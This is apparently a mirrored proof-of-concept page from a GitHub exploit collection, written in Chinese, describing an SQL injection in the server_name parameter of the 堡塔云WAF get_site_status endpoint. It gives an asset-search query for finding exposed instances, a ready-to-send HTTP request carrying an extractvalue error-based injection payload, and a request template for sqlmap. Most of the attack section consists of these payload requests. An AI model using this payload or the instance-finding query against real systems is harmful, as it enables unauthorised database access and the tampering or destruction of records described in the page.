mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-29 14:04:06 +00:00
40 lines
1.8 KiB
Markdown
40 lines
1.8 KiB
Markdown
![]() |
# 宝塔云WAF server_name存在SQL注入漏洞
|
|||
|
|
|||
|
# 一、漏洞简介
|
|||
|
免费的私有云WAF防火墙 堡塔云WAF经过千万级用户认证、为您的业务保驾护航 采用反向代理的方式,网站流量先抵达堡塔云WAF 经过堡塔云WAF检测和过滤后,再转给原来提供服务的网站服务器。堡塔云WAF是一个开源的Web应用程序防火墙,它可以保护网站免受SQL注入,XSS,CSRF,SSRF,命令注入,代码注入,本地文件包含,远程文件包含等攻击 兼容ARM和国产系统。堡塔云WAF server_name 接口处存在SQL注入漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。
|
|||
|
|
|||
|
# 二、影响版本
|
|||
|
+ 堡塔云WAF
|
|||
|
|
|||
|
# 三、资产测绘
|
|||
|
```plain
|
|||
|
title=="404 - Website not exist!"
|
|||
|
```
|
|||
|
|
|||
|

|
|||
|
|
|||
|
# 四、漏洞复现
|
|||
|
```plain
|
|||
|
GET /get_site_status?server_name='-extractvalue(1,concat(0x5c,123456789))-'1 HTTP/2
|
|||
|
Host:
|
|||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
|
|||
|
Content-Length: 0
|
|||
|
```
|
|||
|
|
|||
|

|
|||
|
|
|||
|
sqlmap:
|
|||
|
|
|||
|
```plain
|
|||
|
GET /get_site_status?server_name=1 HTTP/2
|
|||
|
Host:
|
|||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
|
|||
|
Content-Length: 0
|
|||
|
```
|
|||
|
|
|||
|

|
|||
|
|
|||
|
|
|||
|
|
|||
|
> 更新: 2024-06-01 11:17:59
|
|||
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ck7t8ensptmf97se>
|